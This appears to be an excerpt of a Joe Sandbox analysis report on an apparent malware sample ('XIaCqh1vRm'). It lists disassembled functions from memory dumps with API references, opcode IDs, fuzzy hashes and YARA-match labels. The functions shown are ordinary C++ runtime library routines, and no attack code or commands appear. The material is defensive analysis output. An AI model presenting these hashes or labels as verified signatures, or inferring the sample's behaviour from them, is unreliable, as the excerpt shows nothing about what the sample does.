                                                                                                                                                                                                                                                                          • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                          • Instruction ID: f5d5fef6b53f7c64d78a1fa4a44ada6187afeb9d7ca8ddd8923b2a1d6ba132a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031DF31A006119FCB26EF6AC854AAABBB5FF54710F10459EDC0A8B255DB70E945CFE0
                                                                                                                                                                                                                                                                          Function 024B8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 024B8F77
                                                                                                                                                                                                                                                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 024B8F90
                                                                                                                                                                                                                                                                          • FindVITargetTypeInstance.LIBVCRUNTIME ref: 024B8F97
                                                                                                                                                                                                                                                                          • PMDtoOffset.LIBCMT ref: 024B8FB6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1467055271-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                          • Instruction ID: 303c10ebec035a4d168a297348005e896b450e5952acf442b57b24ff5071a0ae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF2127726042049FCF16DF69D849AEE77AEEF44754B24822FE90293280D731E901CEB0
                                                                                                                                                                                                                                                                          Function 02495437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                          • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                          • Instruction ID: d7bb6c09bf257bc3ed6a3e8ff8326dba060557a98909897fac6c20379aa61f84
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D217E72C04209AADF16EBA9D844BDEBFB9AF09325F24401FE104B6240DB749A448E65
                                                                                                                                                                                                                                                                          Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,14DCCF97), ref: 00428DE8
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,14DCCF97), ref: 00428E61
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                                                          Function 024B9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B904F
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024B905D
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024B9076
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,024B9038,024B69C9,024D0907,00000008,024D0C6C,?,?,?,?,024B3CB2,?,?,0045A064), ref: 024B90C8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction ID: 52334fe92522e38c59e5aa06fb3791982173b72628c52414da0830fe3f1b5e94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B601F7326097216EA72B27B5AC88AE72755EF05775B30033FFA20453E1EF1288554DB9
                                                                                                                                                                                                                                                                          Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                                                                                                                                                                                                                                          Function 02494FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02494FCA
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 02494FE1
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 02494FEA
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0249501B
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02495031
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249504F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction ID: fa33ef56bb0c95eeb39764d851304065e66f7ef03ad4c32615aad209ff46229a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D211AC319002289BCF26EBA5D800BAE7FB6BF04314F64011FE416AB290DB749A068FD0
                                                                                                                                                                                                                                                                          Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 0040C1B1
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                                                                                                                                                                                                                                          Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 004054FA
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                          • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                                                          Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                          • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                          Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                          Function 0249C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0249C401
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 0249C418
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 0249C421
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 0249C452
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0249C468
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C486
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction ID: 768ddee3b84e9ddeaa3bf83ec9fb509deffc589887249256fa741be070419ae9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311E1719002289BCF15FBA5D884AEE7F76AF49714F10011FE411BB290DF748A05CFA0
                                                                                                                                                                                                                                                                          Function 02494E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02494E8C
                                                                                                                                                                                                                                                                          • int.LIBCPMT ref: 02494EA3
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0249BFD4
                                                                                                                                                                                                                                                                            • Part of subcall function 0249BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0249BFEE
                                                                                                                                                                                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 02494EAC
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 02494EDD
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02494EF3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02494F11
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction ID: d47f19abc1e49232ed04b5a5dcb823522a3c093a12b881c46147ccb0ac8bd282
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2411CE32D002299BCF15EBA5E800BEE7F76AF44314F24011FE411A7290DB749E06CF90
                                                                                                                                                                                                                                                                          Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                          • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                          • String ID: fJ@
                                                                                                                                                                                                                                                                          • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                                                          • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                          • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                                                          Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
